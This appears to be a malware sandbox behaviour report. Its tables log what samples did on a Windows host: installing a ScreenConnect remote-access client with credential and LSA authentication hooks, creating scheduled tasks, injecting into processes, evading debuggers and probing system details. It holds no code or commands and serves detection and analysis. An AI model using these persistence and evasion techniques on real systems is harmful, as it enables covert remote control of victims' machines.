| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | C:\Windows\system32\msiexec.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\jahxslxg.tmp | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\jahxslxg.newcfg | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 776 set thread context of 1968 | N/A | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe |
| PID 1892 set thread context of 3052 | N/A | C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe | C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe |
| PID 2024 set thread context of 2772 | N/A | C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe | C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe |
| PID 39504 set thread context of 39728 | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\Installer\f77f1be.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF431.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| File opened for modification | C:\Windows\Installer\f77f1be.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF326.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\f77f1c1.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f77f1bf.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF2F6.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev3 | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\Installer\f77f1bf.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | N/A | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev1 | C:\Windows\system32\DrvInst.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387} | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1 | C:\Windows\system32\msiexec.exe | N/A |
